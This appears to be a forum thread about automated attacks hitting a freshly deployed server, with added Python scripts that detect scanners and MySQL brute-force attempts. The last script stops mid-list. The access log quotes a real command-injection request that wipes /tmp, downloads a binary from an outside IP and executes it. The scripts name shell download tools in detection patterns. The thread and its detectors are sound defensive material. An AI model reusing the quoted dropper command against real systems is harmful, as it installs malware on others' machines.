GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Started by el-brujo, 19 December 2020, 12:43 PM


el-brujo

I set up a brand-new web server with no content, nothing at all, and within a few minutes I'm already getting malicious requests xD

85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


I think it would be interesting to publish the web server's mod_security log to see the inhuman number of requests.
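The triage a practitioner would run over that access log, as an added example that is not code from the original post: it parses combined-format lines (including malformed requests such as the raw TLS record header logged as "\x16\x03\x01"), tags each request as a command-injection attempt, a framework probe, a scanner user agent or TLS sent to the plaintext port, and counts hits per source. The pattern set and tag names are this example's own choices; five sample lines are copied from the post above and one benign line is constructed for contrast.

```python
"""Triage of access-log lines like the ones in the post above: which
source sent a scanner probe, a command-injection attempt, or raw TLS to
the plaintext port.  Added example, not code from the original post; the
patterns and tag names are this example's own choices."""
import re
from collections import Counter, defaultdict
from typing import Optional

# Combined log format.  The request field is matched loosely so that
# malformed requests such as a raw TLS ClientHello (logged as
# "\x16\x03\x01") that never contain "HTTP/x.y" still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Shell metacharacters followed by download-and-execute tooling, or the
# drop paths such payloads use.  "+" is the form-encoded space, so
# "cd+/tmp;rm+-rf" reaches the target as "cd /tmp;rm -rf".
CMD_INJECTION_RE = re.compile(
    r'(;|\|\||&&|%3B|%7C)\s*\+?(cd|rm|wget|curl|chmod|sh|tftp|busybox)\b'
    r'|/tmp/|/bins?/',
    re.IGNORECASE,
)
# Mass-scanner user agents seen in the post plus common relatives.
SCANNER_UA_RE = re.compile(r'zgrab|masscan|zmap|nmap|censys', re.IGNORECASE)
# TLS record header (handshake, record version 3.1) on the plaintext vhost:
# a client speaking HTTPS to port 80, typical of internet-wide scanners.
TLS_ON_PLAINTEXT = '\\x16\\x03\\x01'
# Framework probe; the post shows ThinkPHP's "index.php?s=/index/..."
# with the rest of the payload mangled by the logger.
FRAMEWORK_PROBE_RE = re.compile(r'/index\.php\?s=/index/', re.IGNORECASE)

def classify(line: str) -> Optional[dict]:
    """Return ip, status, request and a list of tags, or None if the line
    does not parse.  A 404 on /shell is still an attempt: the verdict
    depends on the request, not on the status code."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m['request']
    tags = []
    if req.startswith(TLS_ON_PLAINTEXT):
        tags.append('tls-to-plaintext-port')
    if CMD_INJECTION_RE.search(req):
        tags.append('command-injection')
    if FRAMEWORK_PROBE_RE.search(req):
        tags.append('framework-probe')
    if SCANNER_UA_RE.search(m['ua']):
        tags.append('scanner-ua')
    return {'ip': m['ip'], 'status': int(m['status']), 'request': req,
            'tags': tags or ['benign']}

def triage(lines):
    """Classify every line; return (per-line results, hits per source IP)."""
    results, per_ip = [], defaultdict(Counter)
    for line in lines:
        r = classify(line)
        if r is None:
            continue
        results.append(r)
        for tag in r['tags']:
            if tag != 'benign':
                per_ip[r['ip']][tag] += 1
    return results, dict(per_ip)

# Five lines copied from the post; the last one is a constructed benign
# request for contrast.
SAMPLE_LINES = [
    r'85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"',
    r'68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"',
    r'192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"',
    r'192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"',
    r'165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"',
    r'203.0.113.10 - - [14/Dec/2020:16:20:00 +0100] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == '__main__':
    results, per_ip = triage(SAMPLE_LINES)
    for r in results:
        print(r['ip'], ','.join(r['tags']), r['request'][:60])
    for ip, hits in per_ip.items():
        print(ip, dict(hits))
```

Run it against a real file with `triage(open('access.log'))`; the per-IP counter is what you would feed to a blocklist or a mod_security rule review, and the 404 on `/shell` shows why status codes alone are useless for spotting these attempts.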

BloodSharp

Quote from: el-brujo on 19 December 2020, 12:43 PM
I set up a brand-new web server with no content, nothing at all, and within a few minutes I'm already getting malicious requests xD

They tried to drop a shell on you that fast already? It must be Shodan, ZoomEye and other alternative scanners...





@XSStringManolo

Quite a lot of time passes between requests and the IP changes. Is it manual?

#!drvy

This is more than common. They are automated scanners that go around testing for known vulnerabilities. The same happens over SSH... as soon as you bring up a server (assign it an IP) you already get login attempts.

Regards

@XSStringManolo

It used to happen to me a lot with one specific network, but in general my servers don't get requests like that.

el-brujo

Quote from: #!drvy on 19 December 2020, 17:22 PM
This is more than common. They are automated scanners that go around testing for known vulnerabilities. The same happens over SSH... as soon as you bring up a server (assign it an IP) you already get login attempts.

Regards

That's what I think too, they're automated, looking for new victims...

Yeah, Fail2ban never stops working on SSH. The failed SSH connection attempts are even more outrageous... I think I had 143 in just a few days.

One day I took a look at the wp-login.php statistics on a WordPress site and the number of login attempts was also alarming. Especially one IP that made thousands of attempts every day xD

el-brujo

Accepting external MySQL connections by default is a mistake.

For a few hours I forgot to add skip-networking to MariaDB's (MySQL) my.cnf

2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2072 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2073 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2075 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2077 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2078 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2079 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2080 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2081 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2082 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2083 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2084 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2085 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2086 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2087 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2088 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2089 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2090 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2091 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2092 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2093 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2094 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2095 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2096 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2097 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2098 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2099 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2100 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2101 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2102 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2103 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2104 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2105 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2106 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2107 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2108 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2109 [Warning] Access denied for user 'moves'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2110 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2111 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2112 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2113 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2114 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2115 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2116 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2117 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2118 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2119 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2120 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2122 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2123 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2124 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2125 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2126 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2127 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2128 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2129 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2130 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2131 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2132 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2133 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2134 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2135 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2136 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2137 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2138 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2139 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2140 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2141 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:08 2142 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2143 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2144 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2145 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2146 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2147 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2148 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2149 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2150 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:12 2151 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:12 2152 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2153 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2154 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2155 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2156 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2157 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2158 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2159 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2160 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2161 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2162 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2163 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2164 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2165 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2166 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2167 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2168 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2169 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2170 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2171 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2172 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2173 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2174 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2175 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2176 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2177 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2178 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:22 2179 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.
2020-12-15 12:42:01 2297 [Note] Hostname 'zg-0915b-171.stretchoid.com' has the following IP addresses:
2020-12-15 12:42:01 2297 [Note]  - 91.126.217.153
2020-12-15 14:12:35 2444 [Warning] IP address '42.192.225.22' could not be resolved: Name or service not known
2020-12-15 14:12:35 2444 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:36 2445 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2446 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2447 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:38 2448 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:39 2449 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:43 2450 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2451 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2452 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:47 2453 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:49 2454 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:52 2455 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:54 2456 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:02 2457 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:04 2459 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:05 2460 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:07 2461 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:08 2462 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2463 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2464 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:14 2465 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:15 2466 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:16 2467 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2468 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2469 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:18 2470 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:19 2471 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2472 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2473 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2474 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2475 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:26 2476 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2477 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2478 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:28 2479 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:31 2480 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:32 2481 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:33 2482 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:34 2483 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:35 2484 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:36 2485 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2486 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2487 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:39 2488 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:42 2489 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:44 2490 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:45 2491 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:46 2492 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:52 2493 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:55 2494 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:57 2495 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:58 2496 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:00 2498 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:01 2499 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:02 2500 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2501 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2502 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:06 2503 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:08 2504 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:10 2505 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:11 2506 [Warning] Access denied for user 'test1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:12 2507 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:13 2508 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:14 2509 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
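What that error log looks like to a detector, as an added example that is not code from the post: a sliding-window counter over the "Access denied" lines that reports each source host once it reaches a threshold of denials within a window, together with the distinct user names it tried (one account being hammered versus a credential spray) and the exact moment a fail2ban-style ban would have fired. It also counts the reverse-DNS warnings, which are what skip-name-resolve removes. Window size, threshold and the report layout are this example's own choices; the sample lines are copied from the post, plus one constructed denial from 198.51.100.7 that must not trigger.

```python
"""Sliding-window brute-force detection over MariaDB/MySQL error-log
lines like the ones in the post above.  Added example, not code from the
post; the window, threshold and report layout are this example's own
choices."""
import re
from collections import defaultdict, deque
from datetime import datetime

DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \d+ \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)
# Reverse-DNS chatter: the server tried to resolve the client and failed,
# or the name did not map back.  Harmless in itself, but it costs a lookup
# per connection and is what skip-name-resolve in my.cnf turns off.
DNS_RE = re.compile(r"\[Warning\] (?:IP address '[^']+' could not be resolved"
                    r"|Hostname '[^']+' does not resolve to)")

WINDOW_SECONDS = 60
THRESHOLD = 10        # denials from one host inside the window

def parse_denials(lines):
    """Yield (timestamp, user, host, used_password) per denial line."""
    for line in lines:
        m = DENIED_RE.match(line)
        if m:
            yield (datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S'),
                   m['user'], m['host'], m['pw'] == 'YES')

def detect(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {host: report} for hosts that reached `threshold` denials
    within any `window`-second span.  The report keeps the distinct user
    names tried (one account vs. a spray), the peak number of denials in
    one window, and the moment the threshold was first crossed, which is
    when a fail2ban-style ban would fire.  Lines must be in file order."""
    recent = defaultdict(deque)      # host -> timestamps inside the window
    reports = {}
    for ts, user, host, _ in parse_denials(lines):
        q = recent[host]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        r = reports.setdefault(host, {'total': 0, 'users': set(),
                                      'peak_in_window': 0, 'first_alert': None})
        r['total'] += 1
        r['users'].add(user)
        r['peak_in_window'] = max(r['peak_in_window'], len(q))
        if len(q) >= threshold and r['first_alert'] is None:
            r['first_alert'] = ts.isoformat()
    return {h: r for h, r in reports.items() if r['first_alert'] is not None}

def count_dns_noise(lines):
    """Number of reverse-DNS warnings in the log."""
    return sum(1 for line in lines if DNS_RE.search(line))

# Twelve denials and two DNS warnings copied from the post, plus one
# constructed single denial from 198.51.100.7 that must not alert.
SAMPLE_LINES = [
    "2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:41 2072 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:42 2073 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
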